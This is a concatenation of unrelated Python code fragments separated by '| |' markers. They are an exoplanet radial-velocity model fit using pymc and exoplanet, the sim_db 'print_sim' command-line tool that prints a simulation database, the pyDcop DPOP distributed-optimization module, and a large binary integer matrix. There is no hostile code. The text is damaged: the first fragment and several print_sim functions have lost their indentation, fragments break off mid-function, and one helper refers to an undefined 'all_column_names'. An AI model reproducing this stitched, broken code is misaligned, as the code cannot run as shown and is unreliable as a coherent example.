# Chen & Kipping predicted M: 49.631 Mearth, based on Rp of 8Re. It
# could be bigger, e.g., 94m/s if 1 Mjup.
# Predicted K: 14.26 m/s
#K = pm.Lognormal("K", mu=np.log(prior_d['K'][0]),
# sigma=prior_d['K'][1])
log_K = pm.Uniform('log_K', lower=prior_d['log_K'][0],
upper=prior_d['log_K'][1])
K = pm.Deterministic('K', tt.exp(log_K))
period = pm.Normal("period", mu=prior_d['period'][0],
sigma=prior_d['period'][1])
ecs = xo.UnitDisk("ecs", testval=np.array([0.7, -0.3]))
ecc = pm.Deterministic("ecc", tt.sum(ecs ** 2))
omega = pm.Deterministic("omega", tt.arctan2(ecs[1], ecs[0]))
phase = xo.UnitUniform("phase")
# use time of transit, rather than time of periastron. we do, after
# all, know it.
t0 = pm.Normal(
"t0", mu=prior_d['t0'][0], sd=prior_d['t0'][1],
testval=prior_d['t0'][0]
)
orbit = xo.orbits.KeplerianOrbit(
period=period, t0=t0, rho_star=rho_star, ecc=ecc, omega=omega,
r_star=r_star
)
#FIXME edit these
# noise model parameters: FIXME what are these?
S_tot = pm.Lognormal("S_tot", mu=np.log(prior_d['S_tot'][0]),
sigma=prior_d['S_tot'][1])
ell = pm.Lognormal("ell", mu=np.log(prior_d['ell'][0]),
sigma=prior_d['ell'][1])
# per instrument parameters
means = pm.Normal(
"means",
mu=np.array([np.median(self.y_obs[self.telvec == u]) for u in
self.uniqueinstrs]),
sigma=500,
shape=self.num_inst,
)
# different instruments have different intrinsic jitters. assign
# those based on the reported error bars. (NOTE: might inflate or
# overwrite these, for say, CHIRON)
sigmas = pm.HalfNormal(
"sigmas",
sigma=np.array([np.median(self.y_err[self.telvec == u]) for u
in self.uniqueinstrs]),
shape=self.num_inst
)
# Compute the RV offset and jitter for each data point depending on
# its instrument
mean = tt.zeros(len(self.x_obs))
diag = tt.zeros(len(self.x_obs))
for i, u in enumerate(self.uniqueinstrs):
mean += means[i] * (self.telvec == u)
diag += (self.y_err ** 2 + sigmas[i] ** 2) * (self.telvec == u)
pm.Deterministic("mean", mean)
pm.Deterministic("diag", diag)
# NOTE: local function definition is jank
def rv_model(x):
return orbit.get_radial_velocity(x, K=K)
kernel = xo.gp.terms.SHOTerm(S_tot=S_tot, w0=2*np.pi/ell, Q=1.0/3)
# NOTE temp
gp = xo.gp.GP(kernel, self.x_obs, diag, mean=rv_model)
# gp = xo.gp.GP(kernel, self.x_obs, diag,
# mean=orbit.get_radial_velocity(self.x_obs, K=K))
# the actual "conditioning" step, i.e. the likelihood definition
gp.marginal("obs", observed=self.y_obs-mean)
pm.Deterministic("gp_pred", gp.predict())
map_estimate = model.test_point
map_estimate = xo.optimize(map_estimate, [means])
map_estimate = xo.optimize(map_estimate, [means, phase])
map_estimate = xo.optimize(map_estimate, [means, phase, log_K])
map_estimate = xo.optimize(map_estimate, [means, t0, log_K, period, ecs])
map_estimate = xo.optimize(map_estimate, [sigmas, S_tot, ell])
map_estimate = xo.optimize(map_estimate)
#
# Derived parameters
#
#TODO
# # planet radius in jupiter radii
# | |
<filename>sim_db/src_command_line_tool/commands/print_sim.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Print parameters of simulations ran or running, i.e. content of database.
Print the content of database with a number of possible restrictions.
"""
# Copyright (C) 2017-2019 <NAME> <<EMAIL>>
# Licenced under the MIT License.
if __name__ == '__main__':
import add_package_root_to_path
import sim_db.src_command_line_tool.commands.helpers as helpers
import sqlite3
import argparse
import shlex
import sys
import os
def command_line_arguments_parser(name_command_line_tool="sim_db",
                                  name_command="print_sim"):
    """Build the argparse parser for the 'print_sim' command.

    Parameters
    ----------
    name_command_line_tool : str
        Name of the command line tool, used in the usage/prog string.
    name_command : str
        Name of this subcommand, used in the usage/prog string.

    Returns
    -------
    argparse.ArgumentParser
        Parser for all 'print_sim' options.
    """
    # Help-text typos fixed: "president(s)" -> "precedence", "can can" ->
    # "can", "occcurence" -> "occurrence", "Defalut" -> "Default".
    parser = argparse.ArgumentParser(
        description=("Print content in sim.db. The default configuration "
                     "corresponding to the '-p default' option is applied first, as "
                     "long as the '--columns'/'-c' option is not passed. It can "
                     "however be overwritten, as only the last occurrence of any "
                     "flag is used."),
        prog="{0} {1}".format(name_command_line_tool, name_command))
    parser.add_argument(
        '--id', '-i', type=int, nargs='+', help="List of ID's.")
    parser.add_argument(
        '--not_id',
        type=int,
        nargs='+',
        help="List of ID's not to print. Takes precedence over '--id'.")
    parser.add_argument(
        '-n', type=int, help="Number of row printed from the bottom up.")
    parser.add_argument(
        '--columns',
        '-c',
        type=str,
        nargs='+',
        default=None,
        help="Name of the columns to print.")
    parser.add_argument(
        '--not_columns',
        type=str,
        nargs='+',
        default=None,
        help=("Name of the columns not to print. Takes precedence over "
              "'--columns'."))
    parser.add_argument(
        '--col_by_num',
        type=int,
        nargs='+',
        default=None,
        help=("Number of the columns to print. All non empty columns are "
              "printed by default."))
    parser.add_argument(
        '--where',
        '-w',
        default='id > -1',
        help=
        ("Add constraints to which columns to print. Must be a valid "
         "SQL (sqlite3) command when added after WHERE in a SELECT command."
         ))
    parser.add_argument(
        '--sort_by',
        default='id',
        help=
        ("What to sort the output by. Must be a valid SQL (sqlite3) "
         "command when added after ORDER BY in a SELECT search. Default is "
         "id."))
    parser.add_argument(
        '--column_names',
        action='store_true',
        help="Print name and type of all columns.")
    parser.add_argument(
        '--all_columns',
        action='store_true',
        help="Print all columns. Takes precedence over '--not_columns'.")
    parser.add_argument(
        '--empty_columns',
        action='store_true',
        help=("Print empty columns. Otherwise only non empty columns are "
              "printed."))
    parser.add_argument(
        '--params',
        action='store_true',
        help=("Print the parameters added before the simulation run."))
    parser.add_argument(
        '--results',
        action='store_true',
        help=("Print results - the parameters added during the simulation, "
              "excluding metadata."))
    parser.add_argument(
        '--metadata',
        action='store_true',
        help=("Print metadata. '--params', '--results' and '--metadata' "
              "will together print all non empty columns."))
    parser.add_argument(
        '--no_headers',
        action='store_true',
        help="Print without any headers.")
    parser.add_argument(
        '--max_width',
        type=int,
        default=None,
        help=("Upper limit for the width of each column. Default is no "
              "limit."))
    parser.add_argument(
        '--first_line',
        action='store_true',
        help="Print only the first line of any entry.")
    parser.add_argument(
        '--vertically',
        '-v',
        action='store_true',
        help="Print columns vertically.")
    parser.add_argument(
        '-p',
        type=str,
        default=None,
        help=
        ("Personal print configuration. Substituted with the print "
         "configuration in 'settings.txt' corresponding to the provided "
         "key string."))
    parser.add_argument(
        '--diff',
        '-d',
        action='store_true',
        help=
        ("Remove columns with the same value for all the "
         "simulations. This leaves only the parameters that are different "
         "between the simulations."))
    return parser
def get_personalized_print_config(key_string):
    """Look up a personal print configuration by key.

    Scans the 'print_config' entries in settings.txt for a line of the
    form "key : config" whose key matches ``key_string``.

    Returns
    -------
    str or None
        The configuration string for ``key_string``, or None when no
        matching entry exists.
    """
    for entry in helpers.Settings().read('print_config'):
        parts = entry.split(':')
        if len(parts) > 1 and key_string.strip() == parts[0].strip():
            return parts[1].strip()
    return None
# Columns holding run metadata (scheduling, provenance and environment
# information) rather than simulation parameters or results; used by the
# '--metadata' / '--results' options to include or exclude these columns.
metadata_columns = ['status', 'add_to_job_script', 'max_walltime', 'n_tasks',
        'job_id', 'time_submitted', 'time_started', 'used_walltime',
        'cpu_info', 'git_hash', 'commit_message', 'git_diff',
        'git_diff_stat', 'sha1_executables', 'initial_parameters']
def get_initial_parameters_columns(db_cursor, args):
    """Collect the union of 'initial_parameters' names for the selected runs.

    Parameters
    ----------
    db_cursor : sqlite3.Cursor
        Cursor into the sim_db database (table 'runs').
    args : argparse.Namespace
        Parsed command line arguments; ``args.where`` and ``args.id``
        restrict which simulation rows are inspected.

    Returns
    -------
    list of str
        Unique initial-parameter column names (order unspecified).
    """
    # Idiom fix: compare with None using identity ('is'/'is not'), not '!='.
    ids = []
    if args.where is not None:
        try:
            db_cursor.execute("SELECT id FROM runs WHERE {0};".format(args.where))
        except sqlite3.OperationalError as e:
            if str(e) == "no such table: runs":
                print("There does NOT exist a database yet.\n"
                      "Try adding a simulation from a parameter file.")
                exit(1)
            else:
                raise e
        ids = [id_tuple[0] for id_tuple in db_cursor.fetchall()]
    if args.id is not None:
        # Intersect with the explicit id list when the WHERE clause matched
        # rows; otherwise fall back to the explicit ids directly.
        if len(ids) > 0:
            ids = [i for i in ids if i in args.id]
        else:
            ids = args.id
    all_initial_parameters = []
    for i in ids:
        db_cursor.execute("SELECT initial_parameters FROM runs WHERE id={0}"
                          .format(i))
        initial_parameters = db_cursor.fetchone()[0]
        if initial_parameters is not None:
            initial_parameters, correct_type = (
                    helpers.convert_text_to_correct_type(
                            initial_parameters, 'string array'))
            all_initial_parameters = all_initial_parameters + initial_parameters
    # Deduplicate names shared by several simulations.
    all_initial_parameters = list(set(all_initial_parameters))
    return all_initial_parameters
def add_columns(new_columns, columns, column_names):
    """Merge ``new_columns`` into the SQL column string and name list.

    Each name in ``new_columns`` that is not already in ``column_names`` is
    appended to ``column_names`` (in place) and to the comma-separated
    ``columns`` string. A leading ", " separator is stripped from the
    string before returning.

    Returns
    -------
    (columns, column_names) : tuple[str, list]
        The updated column string and name list.
    """
    for name in new_columns:
        if name in column_names:
            continue
        column_names.append(name)
        columns = "{0}, {1}".format(columns, name)
    if columns.startswith(", ") and len(columns) > 2:
        columns = columns[2:]
    return (columns, column_names)
def select_command(name_command_line_tool, name_command, db_cursor, args,
                   all_column_names):
    """Build and run the SELECT query for 'print_sim' and post-process it.

    Assembles the column list from the '--columns', '--col_by_num',
    '--params', '--results' and '--metadata' flags, runs the query (one
    query with the WHERE restriction, or one query per explicitly
    requested id), then strips empty/excluded columns and excluded rows,
    and truncates to the last ``-n`` rows.

    Returns
    -------
    (selected_output, column_names) : tuple[list[list], list[str]]
        The selected rows as lists of values, and the matching column
        names.
    """
    columns = ""
    column_names = []
    if args.columns != None:
        columns, column_names = add_columns(args.columns, columns,
                                            column_names)
    if args.col_by_num != None:
        new_columns = [all_column_names[i] for i in args.col_by_num]
        columns, column_names = add_columns(new_columns, columns, column_names)
    if args.params:
        parameter_columns = get_initial_parameters_columns(db_cursor, args)
        columns, column_names = add_columns(parameter_columns, columns,
                                            column_names)
    if args.results:
        # Results are everything that is neither an initial parameter nor
        # metadata.
        parameter_columns = get_initial_parameters_columns(db_cursor, args)
        result_columns = [
                c for c in all_column_names
                if (c not in parameter_columns and c not in metadata_columns)
        ]
        columns, column_names = add_columns(result_columns, columns,
                                            column_names)
    if args.metadata:
        columns, column_names = add_columns(metadata_columns, columns,
                                            column_names)
    # No explicit selection (or '--all_columns'): select everything.
    if columns == "" or args.all_columns:
        columns = '*'
        column_names = all_column_names
    for col in column_names:
        if col not in all_column_names:
            print("ERROR: {0} is NOT a column in the database.\n"
                  "Run command '{1} {2} --column_names' to see all the columns "
                  "in the database.".format(col, name_command_line_tool,
                                            name_command))
            exit(1)
    if args.id == None:
        try:
            db_cursor.execute("SELECT {0} FROM runs WHERE {1} ORDER BY {2};"
                              .format(columns, args.where, args.sort_by))
        except sqlite3.OperationalError as e:
            if str(e) == "no such table: runs":
                print("There do NOT exists a database yet.\n"
                      "Try adding a simulation from a parameter file.")
                exit(1)
            else:
                raise e
        selected_output = db_cursor.fetchall()
    else:
        # Explicit ids: run one query per id so the output preserves the
        # order the ids were given in.
        selected_output = []
        for i in args.id:
            restrictions = args.where + " AND id = {0}".format(i)
            try:
                db_cursor.execute(
                        "SELECT {0} FROM runs WHERE {1} ORDER BY {2};".format(
                                columns, restrictions, args.sort_by))
            except sqlite3.OperationalError as e:
                if str(e) == "no such table: runs":
                    print("There do NOT exists a database yet.\n"
                          "Try adding a simulation from a parameter file.")
                    exit(1)
                else:
                    raise e
            output = db_cursor.fetchall()
            if len(output) == 0:
                # Strip the always-true default "id > -1 AND " prefix from
                # the error message for readability.
                if (len(restrictions) > 12
                        and restrictions[0:12] == 'id > -1 AND '):
                    restrictions = restrictions[12:]
                print("There exists no entries in the database with: {0}"
                      .format(restrictions))
                exit(1)
            selected_output.append(output[0])
    # Convert tuples to lists so columns/rows can be deleted in place.
    selected_output = [list(row) for row in selected_output]
    if (not args.all_columns and not args.empty_columns):
        selected_output, column_names = remove_empty_columns(
                selected_output, column_names, args)
    if (args.not_columns != None and not args.all_columns):
        selected_output, column_names = remove_columns_not_to_print(
                selected_output, column_names, args.not_columns)
    if args.not_id != None:
        selected_output = remove_rows_not_to_print(selected_output,
                                                   args.not_id)
    n = args.n
    if n == None:
        n = len(selected_output)
    selected_output = selected_output[-n:]
    return selected_output, column_names
def remove_empty_columns(selected_output, column_names, args):
    """Drop (in place) every column whose value is None in all selected rows.

    Columns explicitly requested by the user (via ``args.columns`` or
    ``args.col_by_num``) are never removed, even when entirely empty.

    Parameters
    ----------
    selected_output : list of list
        Rows fetched from the database; mutated in place.
    column_names : list of str
        Header names matching the row columns; mutated in place.
    args : namespace
        Parsed CLI arguments; only ``columns`` and ``col_by_num`` are read.

    Returns
    -------
    tuple
        The (mutated) ``selected_output`` and ``column_names``.
    """
    protected = []
    if args.columns is not None:
        protected = args.columns
    if args.col_by_num is not None:
        # all_column_names is a module-level list of every database column.
        protected = protected + [all_column_names[i] for i in args.col_by_num]
    if not selected_output:
        return selected_output, column_names
    doomed = [
        col
        for col in range(len(selected_output[0]))
        if all(record[col] is None for record in selected_output)
        and column_names[col] not in protected
    ]
    # Indices are unique and ascending, so deleting from the right keeps the
    # remaining indices valid.
    for col in reversed(doomed):
        for record in selected_output:
            del record[col]
        del column_names[col]
    return selected_output, column_names
def remove_columns_not_to_print(selected_output, column_names,
                                not_columns):
    """Drop (in place) every column whose name appears in ``not_columns``.

    Parameters
    ----------
    selected_output : list of list
        Rows fetched from the database; mutated in place.
    column_names : list of str
        Header names matching the row columns; mutated in place.
    not_columns : list of str
        Names of the columns the user asked to hide.

    Returns
    -------
    tuple
        The (mutated) ``selected_output`` and ``column_names``.
    """
    if not selected_output:
        return selected_output, column_names
    doomed = [
        idx
        for idx, header in enumerate(column_names)
        for hidden in not_columns
        if header == hidden
    ]
    # Each deletion shifts the later indices one step to the left.
    shift = 0
    for idx in doomed:
        for record in selected_output:
            del record[idx - shift]
        del column_names[idx - shift]
        shift += 1
    return selected_output, column_names
def remove_rows_not_to_print(selected_output, not_id):
    """Remove (in place) every row whose id — the first column — is in ``not_id``.

    Bug fixes relative to the original implementation:
    - the deletion offset was never incremented (``n_deleted += 0``), so after
      the first deletion all later indices were stale and the wrong rows were
      removed;
    - a duplicated id in ``not_id`` caused the same row index to be recorded
      twice and an extra, unrelated row to be deleted.

    Parameters
    ----------
    selected_output : list of list
        Rows fetched from the database; mutated in place.
    not_id : list
        Ids of the rows the user asked to hide.

    Returns
    -------
    list
        The (mutated) ``selected_output``.
    """
    rows_to_remove = [
        j for j, row in enumerate(selected_output) if row[0] in not_id
    ]
    n_deleted = 0
    for j in rows_to_remove:
        # Indices recorded above shift left by one for each prior deletion.
        del selected_output[j - n_deleted]
        n_deleted += 1
    return selected_output
def get_max_widths(selected_output, column_names, no_headers, extra_space):
    """Compute the display width needed for each column.

    A column's width is the length of its widest cell (only the first line of
    multi-line values counts) or of its header — whichever is larger — plus
    ``extra_space`` padding characters.

    Fixes relative to the original: the empty-input path returned the
    ``selected_output`` list itself rather than a list of widths (the values
    coincided only because both were empty); the first-line string was also
    computed twice per cell.

    Parameters
    ----------
    selected_output : list of list
        Rows to be printed.
    column_names : list of str
        Header names; ignored when ``no_headers`` is true.
    no_headers : bool
        When true, headers do not contribute to the width.
    extra_space : int
        Padding added to every column width.

    Returns
    -------
    list of int
        One width per column; empty when there are no rows.
    """
    if len(selected_output) == 0:
        return []
    widths = []
    for col in range(len(selected_output[0])):
        max_width = 0 if no_headers else len(column_names[col])
        for row in selected_output:
            # Only the first line of a multi-line value affects the width.
            first_line = str(row[col]).split('\n')[0]
            max_width = max(max_width, len(first_line))
        widths.append(max_width + extra_space)
    return widths
def remove_columns_with_only_same_values(selected_output, column_names):
    """Drop (in place) every column whose value is identical in all rows.

    Note that with zero or one row every column trivially qualifies, so all
    columns are removed in that case (same as the original behaviour).

    Parameters
    ----------
    selected_output : list of list
        Rows fetched from the database; mutated in place.
    column_names : list of str
        Header names matching the row columns; mutated in place.

    Returns
    -------
    tuple
        The (mutated) ``selected_output`` and ``column_names``.
    """
    doomed = []
    for col in range(len(column_names)):
        cells = [row[col] for row in selected_output]
        # A column is constant when every adjacent pair of cells is equal.
        if all(a == b for a, b in zip(cells, cells[1:])):
            doomed.append(col)
    # Delete from the right so earlier indices stay valid.
    for col in reversed(doomed):
        del column_names[col]
        for row in selected_output:
            del row[col]
    return selected_output, column_names
def print_selected_parameters(selected_output, column_names, no_headers,
max_width, first_line):
extra_space = 2
widths = get_max_widths(selected_output, column_names, no_headers,
extra_space)
if not no_headers:
headers = ""
total_width = 0
for w, col in zip(widths, column_names):
column_header = col + (w - len(col)) * " "
if max_width and w > max_width:
column_header = column_header[:max_width] + extra_space * " "
total_width += max_width + extra_space
else:
total_width += w
headers += column_header
print(headers)
print(total_width * "=")
for row in selected_output:
| |
<reponame>gauthier-emse/pyDcop<filename>pydcop/algorithms/dpop.py
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
DPOP: Dynamic Programming Optimization Protocol
-----------------------------------------------
Dynamic Programming Optimization Protocol is an optimal,
inference-based, dcop algorithm implementing a dynamic programming procedure
in a distributed way :cite:`petcu_distributed_2004`.
DPOP works on a Pseudo-tree, which can be built using the
:ref:`distribute<pydcop_commands_distribute>` command
(and is automatically built when using the :ref:`solve<pydcop_commands_solve>` command).
This algorithm has no parameter.
Example
^^^^^^^
::
pydcop -algo dpop graph_coloring_eq.yaml
"""
from random import choice
from typing import Iterable
from pydcop.computations_graph.pseudotree import get_dfs_relations
from pydcop.infrastructure.computations import Message, VariableComputation, register
from pydcop.dcop.objects import Variable
from pydcop.dcop.relations import (
NAryMatrixRelation,
Constraint,
find_arg_optimal,
join,
projection,
)
from pydcop.algorithms import ALGO_STOP, ALGO_CONTINUE, ComputationDef
GRAPH_TYPE = "pseudotree"
def build_computation(comp_def: ComputationDef):
    """Instantiate the DPOP computation described by ``comp_def``."""
    return DpopAlgo(comp_def)
def computation_memory(*args):
    """Memory-footprint estimation; not implemented for DPOP.

    Always raises NotImplementedError.
    """
    message = "DPOP has no computation memory implementation (yet)"
    raise NotImplementedError(message)
def communication_load(*args):
    """Communication-load estimation; not implemented for DPOP.

    Always raises NotImplementedError.
    """
    message = "DPOP has no communication_load implementation (yet)"
    raise NotImplementedError(message)
class DpopMessage(Message):
    """A message exchanged between DPOP computations (types: UTIL, VALUE)."""

    def __init__(self, msg_type, content):
        super(DpopMessage, self).__init__(msg_type, content)

    @property
    def size(self):
        # Approximate message size, used for communication metrics.
        # NOTE(review): implicitly returns None for any type other than
        # UTIL or VALUE — confirm callers only query size on these two types.
        # Dpop messages
        # UTIL : multi-dimensional matrices
        # VALUE :
        if self.type == "UTIL":
            # UTIL messages are multi-dimensional matrices: size is the
            # product of the dimensions (total number of cells).
            shape = self.content.shape
            size = 1
            for s in shape:
                size *= s
            return size
        elif self.type == "VALUE":
            # VALUE message are a value assignment for each var in the
            # separator of the sender: one (name, value) pair per variable.
            return len(self.content[0]) * 2

    def __str__(self):
        return f"DpopMessage({self._msg_type}, {self._content})"
class DpopAlgo(VariableComputation):
"""
DPOP: Dynamic Programming Optimization Protocol
When running this algorithm, the DFS tree must be already defined and the
children, parents and pseudo-parents must be known.
In DPOP:
    * A computation represents, and selects a value for, one variable.
* A constraint is managed (i.e. referenced) by a single computation object:
this means that, when building the computations, each constraint must only be
passed as argument to a single computation.
* A constraint must always be managed by the lowest node in the DFS
tree that the relation depends on (which is especially important for
non-binary relation). The pseudo-tree building mechanism already
takes care of this.
DPOP computations support two kinds of messages:
* UTIL message:
sent from children to parent, contains a relation (as a
multi-dimensional matrix) with one dimension for each variable in our
separator.
* VALUE messages :
      contains the value of the parent of the node and the values of all
      variables that were present in our UTIL message to our parent (that is
      to say, our separator).
Parameters
----------
variable: Variable
The Variable object managed by this algorithm
parent: variable name (str)
the parent for this node. A node has at most one parent
but may have 0-n pseudo-parents. Pseudo parent are not given
explicitly but can be deduced from the constraints and children
(if the union of the constraints' scopes contains a variable that is not a
children, it must necessarily be a pseudo-parent).
If the variable shares a constraints with its parent (which is the
most common case), it must be present in the relation arg.
children: name of children variables (list of str)
the children variables of the variable argument, in the DFS tree
constraints: List of Constraints
constraints managed by this computation. These
relations will be used when calculating costs. It must
depends on the variable arg. Unary relation are also supported.
Remember that a relation must always be managed by the lowest node in
the DFS tree that the relation depends on (which is especially
important for non-binary relation).
comp_def: ComputationDef
computation definition, gives the algorithm name (must be dpop) and the mode
(min or max)
"""
    def __init__(self, comp_def: ComputationDef):
        """Set up the DPOP computation for one variable of the DFS tree.

        Reads the DFS relations (parent, pseudo-parents, children,
        pseudo-children) from the computation node, keeps only the constraints
        this node is the lowest involved node for, and seeds the joined-utils
        matrix with the variable's own unary cost when it has one.
        """
        assert comp_def.algo.algo == "dpop"
        super().__init__(comp_def.node.variable, comp_def)
        self._mode = comp_def.algo.mode
        self._parent, self._pseudo_parents, self._children, self._pseudo_children = get_dfs_relations(
            self.computation_def.node
        )
        # Filter the relations on all the nodes of the DFS tree to only keep the
        # relation on the lowest node in the tree that is involved in the
        # relation.
        self._constraints = []
        descendants = self._pseudo_children + self._children
        self.logger.debug(f"Descendants for computation {self.name}: {descendants} ")
        # Work on a copy so we can remove entries while scanning the original.
        constraints = list(comp_def.node.constraints)
        for r in comp_def.node.constraints:
            # filter out all relations that depend on one of our descendants:
            # those will be handled lower in the tree.
            names = [v.name for v in r.dimensions]
            for descendant in descendants:
                if descendant in names:
                    constraints.remove(r)
                    break
        self._constraints = constraints
        self.logger.debug(
            f"Constraints for computation {self.name}: {self._constraints} "
        )
        if hasattr(self._variable, "cost_for_val"):
            # The variable carries a unary cost function: seed the joined
            # utility matrix with one cost per domain value.
            costs = []
            for d in self._variable.domain:
                costs.append(self._variable.cost_for_val(d))
            self._joined_utils = NAryMatrixRelation(
                [self._variable], costs, name="joined_utils"
            )
        else:
            self._joined_utils = NAryMatrixRelation([], name="joined_utils")
        # Maps each child to the separator seen in its UTIL message.
        self._children_separator = {}
        self._waited_children = []
        if not self.is_leaf:
            # If we are not a leaf, we must wait for the util messages from
            # our children.
            # This must be done in __init__ and not in on_start because we
            # may get an util message from one of our children before
            # running on_start, if this child computation starts faster or
            # before us.
            self._waited_children = list(self._children)
def footprint(self):
return computation_memory(self.computation_def.node)
@property
def is_root(self):
return self._parent is None
@property
def is_leaf(self):
return len(self._children) == 0
    def on_start(self):
        """Start the DPOP computation for this node.

        Leaf nodes immediately send their UTIL message to their parent.
        A node that is both root and leaf (isolated variable) selects its
        value right away and finishes. All other nodes do nothing here:
        they wait for UTIL messages from their children (see __init__).
        """
        if self.is_leaf and not self.is_root:
            # If we are a leaf in the DFS Tree we can immediately compute
            # our util and send it to our parent.
            # Note: as a leaf, our separator is the union of our parents and
            # pseudo-parents
            util = self._compute_utils_msg()
            self.logger.info(
                f"Leaf {self._variable.name} init message {self._variable.name} -> {self._parent} : {util}"
            )
            msg = DpopMessage("UTIL", util)
            self.post_msg(self._parent, msg)
        elif self.is_leaf:
            # we are both root and leaf : means we are an isolated variable, we
            # can select our own value alone:
            if self._constraints:
                # Join all (necessarily unary) constraints and pick the
                # optimal value according to the mode (min or max).
                for r in self._constraints:
                    self._joined_utils = join(self._joined_utils, r)
                values, current_cost = find_arg_optimal(
                    self._variable, self._joined_utils, self._mode
                )
                self.select_value_and_finish(values[0], float(current_cost))
            elif hasattr(self._variable, "cost_for_val"):
                # The variable has no constraint with other variable but has a cost function,
                # (i.e a unary constraint) : select the value that optimize that constraint.
                # _joined_utils was seeded with these costs in __init__.
                self.logger.debug(
                    f"Selecting value for {self._variable.name} based only on cost function"
                )
                values, current_cost = find_arg_optimal(
                    self._variable, self._joined_utils, self._mode
                )
                self.select_value_and_finish(values[0], float(current_cost))
            else:
                # If the variable is not constrained, we can simply take a value at
                # random:
                self.logger.debug(
                    f"Selecting random value for {self._variable.name} (not constrained)"
                )
                value = choice(self._variable.domain)
                self.select_value_and_finish(value, 0.0)
def stop_condition(self):
# dpop stop condition is easy at it only selects one single value !
if self.current_value is not None:
return ALGO_STOP
else:
return ALGO_CONTINUE
    def select_value_and_finish(self, value, cost):
        """
        Select a value for this variable and terminate the computation.

        DPOP is not iterative: once we have selected our value the algorithm
        is finished for this computation, so this records the selection,
        stops the computation and signals completion.

        Parameters
        ----------
        value: any (depends on the domain)
            the selected value
        cost: float
            the local cost for this value
        """
        self.value_selection(value, cost)
        self.stop()
        self.finished()
        self.logger.info(f"Value selected at {self.name} : {value} - {cost}")
@register("UTIL")
def _on_util_message(self, variable_name, recv_msg, t) -> None:
"""
Message handler for UTIL messages.
Parameters
| |
0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
